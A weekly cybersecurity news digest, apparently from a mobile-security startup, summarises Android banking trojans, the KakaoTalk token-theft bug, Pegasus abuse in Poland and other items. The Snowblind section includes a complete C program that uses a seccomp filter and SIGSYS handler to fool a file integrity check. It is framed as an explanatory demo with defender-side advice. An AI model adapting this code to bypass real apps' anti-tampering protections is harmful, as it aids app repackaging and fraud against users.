Weekly Cybersecurity News
Malloc (YC S21)
Malloc is an AI-driven cybersecurity startup focused on mobile and app security.
This week we bring you the latest news from the world of cybersecurity. Android malware dominates the headlines, including the new Medusa banking Trojan and the Snowblind malware. Both reach users' devices through phishing, by posing as popular apps, or as fake updates, and both are a serious threat to users' privacy and finances. To learn more about these threats, read the full article below.
New Medusa Android Trojan Targets Banking Users Across 7 Countries:
The Medusa Android Trojan has resurfaced with new, advanced features, targeting banking users in Canada, France, Italy, Spain, Turkey, the U.K., and the U.S. The new campaigns, active since July 2023, use a variant that requests fewer permissions to evade detection but still relies on Android's accessibility services API, which it abuses to draw full-screen overlays that steal credentials and to remotely uninstall apps. Medusa spreads through phishing and dropper apps posing as fake updates, and it retrieves its command-and-control server address from legitimate services such as Telegram. The expansion into new regions indicates a broader attack strategy.
Source: The Hacker News
Snowblind malware abuses Android security feature to bypass security:
Snowblind is a new Android malware that abuses seccomp, a Linux kernel security feature, to bypass the anti-tampering protections of apps that handle sensitive data. The attacker repackages the target app with injected native code that loads before the app's own integrity check and installs a seccomp filter. The filter traps the system calls the check uses to read the app's files and redirects them so the check sees an unmodified file, all with minimal performance impact, so users notice nothing. With the check defeated, Snowblind can disable security features in the app, such as two-factor authentication or biometric verification, read sensitive information, control the device, and exfiltrate data. It has been observed targeting an app in Southeast Asia.
Source: Bleeping Computer
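The mechanism described above, shown as an added example that is not code from the article, from Promon, or from the malware itself: a seccomp-bpf filter traps openat() calls made with dirfd == AT_FDCWD (what libc's open() and fopen() issue), a SIGSYS handler rewrites the path when it names a "tampered" file and re-issues the call so the caller silently receives the "pristine" copy, and a small defender-side check reads the process's seccomp mode. The file paths under /tmp, their contents, and the function names are constructed for the demo; it assumes a little-endian x86_64 or aarch64 Linux host and must be compiled with glibc or musl. Once loaded, the filter cannot be removed from the process.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <ucontext.h>
#include <unistd.h>

/* Register mapping for the trapped call (assumption: little-endian x86_64 or aarch64). */
#if defined(__x86_64__)
#define SC_ARCH       AUDIT_ARCH_X86_64
#define SC_ARG(uc, i) ((uc)->uc_mcontext.gregs[(i) == 1 ? REG_RSI : (i) == 2 ? REG_RDX : REG_R10])
#define SC_RET(uc, v) ((uc)->uc_mcontext.gregs[REG_RAX] = (v))
#elif defined(__aarch64__)
#define SC_ARCH       AUDIT_ARCH_AARCH64
#define SC_ARG(uc, i) ((uc)->uc_mcontext.regs[(i)])
#define SC_RET(uc, v) ((uc)->uc_mcontext.regs[0] = (v))
#else
#error "add a register mapping for this architecture"
#endif

/* Constructed sample files: the "tampered APK" the check reads, and the pristine copy. */
static const char *const TAMPERED = "/tmp/snowblind_demo_tampered.txt";
static const char *const PRISTINE = "/tmp/snowblind_demo_pristine.txt";
static int cwd_fd = -1; /* used instead of AT_FDCWD when the handler re-issues a call */

/* SIGSYS handler: swap the path if it names the tampered file, then re-issue openat() with
 * cwd_fd as dirfd so the filter passes it (dirfd is ignored for absolute paths; relative
 * ones still resolve against the original working directory). */
static void on_sigsys(int sig, siginfo_t *si, void *ctx) {
    ucontext_t *uc = ctx;
    int saved_errno = errno;
    (void)sig;
    if (si->si_syscall != SYS_openat) return;
    const char *path = (const char *)(unsigned long)SC_ARG(uc, 1);
    if (strcmp(path, TAMPERED) == 0) path = PRISTINE;
    long r = syscall(SYS_openat, cwd_fd, path, (int)SC_ARG(uc, 2), (unsigned)SC_ARG(uc, 3));
    SC_RET(uc, r < 0 ? -errno : r);
    errno = saved_errno;
}

/* seccomp-bpf program: trap openat() calls whose dirfd is AT_FDCWD; allow everything else,
 * including the handler's re-issued call. */
static int install_filter(void) {
    struct sock_filter code[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SC_ARCH, 0, 5),  /* wrong arch: allow (real filters kill) */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_openat, 0, 3),
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, args)), /* low 32 bits of args[0] */
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (unsigned)AT_FDCWD, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_TRAP),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = { .len = sizeof code / sizeof code[0], .filter = code };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0) return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}

static int write_file(const char *path, const char *text) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(text, f);
    return fclose(f);
}

/* Create the sample files, register the handler, load the filter (irreversible). 0 on success. */
int snowblind_demo_setup(void) {
    if (write_file(TAMPERED, "tampered") || write_file(PRISTINE, "pristine")) return -1;
    if ((cwd_fd = open(".", O_RDONLY | O_DIRECTORY)) < 0) return -1;
    struct sigaction sa = { .sa_sigaction = on_sigsys, .sa_flags = SA_SIGINFO };
    if (sigaction(SIGSYS, &sa, NULL) != 0) return -1;
    return install_filter();
}

/* The "integrity check": 1 if the file at path reads as expect, else 0. It calls
 * openat(AT_FDCWD, ...) explicitly, which is what glibc's open() issues internally. */
int file_reads_as(const char *path, const char *expect) {
    char buf[64] = { 0 };
    int fd = openat(AT_FDCWD, path, O_RDONLY);
    if (fd < 0) return 0;
    ssize_t n = read(fd, buf, sizeof buf - 1);
    close(fd);
    return n >= 0 && strcmp(buf, expect) == 0;
}

/* Defender-side check: PR_GET_SECCOMP is 0 with no filter and 2 once one is loaded. Caveat:
 * every Android app already runs under the zygote's filter, so an app should compare the
 * Seccomp_filters count in /proc/self/status against its expected baseline, not test presence. */
int seccomp_mode(void) { return (int)prctl(PR_GET_SECCOMP, 0, 0, 0, 0); }

int main(void) {
    if (snowblind_demo_setup() != 0) { perror("setup"); return 1; }
    printf("seccomp mode: %d, tampered path reads as pristine: %d\n",
           seccomp_mode(), file_reads_as(TAMPERED, "pristine"));
    return 0;
}
```

The filter keys on the dirfd argument rather than on the caller's instruction pointer, which keeps it portable across libcs; a real anti-tampering check that wants to resist this kind of interception should avoid trusting any single path-based read of its own APK, for example by also comparing the inode or the size reported by fstat() on the descriptor it actually read from.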
Rafel RAT Targets Android Users in Ransomware Attacks:
Rafel RAT, an open-source remote administration tool, is being widely used by cybercriminals to target Android devices for espionage and ransomware operations. The malware lets attackers remotely control devices, steal data, manipulate device functions, encrypt files, and conduct surveillance. It is usually delivered through phishing campaigns, posing as legitimate apps such as Instagram and WhatsApp, and requests sensitive permissions so that it can keep control of the device. High-profile targets include military organizations in the U.S., China, and Indonesia, and a significant share of the infected devices no longer receive security updates. To mitigate these threats, users are advised to keep their devices updated, avoid untrusted app sources, and use robust security solutions.
Source: Cyber Insider
1-Click Exploit In Kakaotalk’s Android App Allows Arbitrary Code Execution:
A critical vulnerability in KakaoTalk, a widely used Android messaging app, allows remote attackers to execute arbitrary code. The flaw, tracked as CVE-2023-51219, is reachable through the CommerceBuyActivity WebView, which attaches the user's access token to its requests in the Authorization HTTP header. A deep link is used to open that WebView on a crafted URL, which redirects the request to an attacker-controlled server, and the server captures the Authorization header. With the stolen token an attacker can take over the victim's account and read their chat messages. The risk is amplified by two further weaknesses noted in the report: KakaoTalk does not enable end-to-end encryption by default, and a user's e-mail address can be overwritten without verification.
Source: GB Hackers
Millions Of Samsung Galaxy Users Must Wait ‘Months’ For Critical New Update:
Millions of Samsung Galaxy users are at risk due to a critical zero-day vulnerability, CVE-2024-32896, which Google recently addressed for its Pixel devices but has yet to fix for other Android devices. This vulnerability allows attackers to bypass device security features and potentially access sensitive data. Despite Google's efforts to secure Pixels, other manufacturers, including Samsung, may not receive a fix for several months, leaving their devices exposed. The issue underscores the challenges in rapidly deploying security updates across the fragmented Android ecosystem, highlighting a significant concern for users and the need for a more streamlined update process.
Source: Forbes
Hackers Using VPNs To Exploit Restrictions & Steal Mobile Data:
Hackers are exploiting loopholes in telecom provider policies to offer "free" mobile data on Telegram channels, primarily targeting users in Africa and Asia. They share configuration files to mimic zero-rated traffic, enabling users to bypass data metering. Using tools like HTTP Injector and VPNs with obfuscation techniques, attackers manipulate data packets, HTTP headers, and APN settings to disguise their data usage as legitimate traffic from zero-rated services. This abuse is facilitated through encrypted tunnels and proxies. Telecom providers can counter these tactics with multi-layered defenses such as deep packet inspection, traffic analysis, bandwidth limitations, blacklisting IP addresses, and enhancing APN security.
Source: GB Hackers
Beware Of Illegal OTT Platforms That Expose Sensitive Personal Information:
Illegal Chinese OTT streaming platforms have increasingly been the source of data breaches, exposing sensitive user information such as names and financial details to criminal exploitation. These platforms operate largely undetected, which makes them hard to hold accountable and leaves the exposed data at risk. Many of them run the HFS (HTTP File Server) software, in particular the unstable 2.3 beta release, whose known vulnerabilities are being exploited to leak user data. Criminal IP, a search engine for internet-exposed assets, can identify servers running HFS and so locate these illegal platforms. Sensitive user data is often stored in plain-text files, further compromising security. The platforms also use domain fluxing to evade detection, complicating efforts to shut them down. To combat these issues, law enforcement and content providers are advised to implement network-level countermeasures such as IP address blocking and traffic filtering.
Source: GB Hackers
Apple Issues New Google Chrome Warning For iPhone Users:
Apple has taken a public swipe at Google Chrome's privacy practices, in what amounts to a warning to iPhone users. A new advertising campaign in San Francisco promotes Safari as "a browser that's actually private," an indirect criticism of Chrome's data collection. Despite Chrome's popularity and rich feature set, it has faced numerous privacy complaints and high-profile vulnerabilities. Apple's position is that Safari offers stronger privacy protections by default, and it particularly contrasts Safari's private browsing mode with Chrome's Incognito mode. The message is clear: iPhone users concerned about privacy should default to Safari over Chrome.
Source: Forbes
Polish investigators seize Pegasus spyware systems as part of probe into alleged abuse:
Polish prosecutors have seized Pegasus spyware systems from a government agency as part of an investigation into allegations that the previous government used the software to spy on opposition politicians. The investigation, which covers the period from November 2017 to December 2022, includes examining documents and securing devices from several security agencies. Testimony has been collected from high-ranking officials, including former Deputy Prime Minister Jarosław Kaczyński. Nearly 600 individuals, mostly opposition figures, were reportedly targeted. The Senate has highlighted constitutional violations, and criminal charges are being considered. The probe aims to bring transparency and accountability to the misuse of Pegasus in Poland.
Source: The Record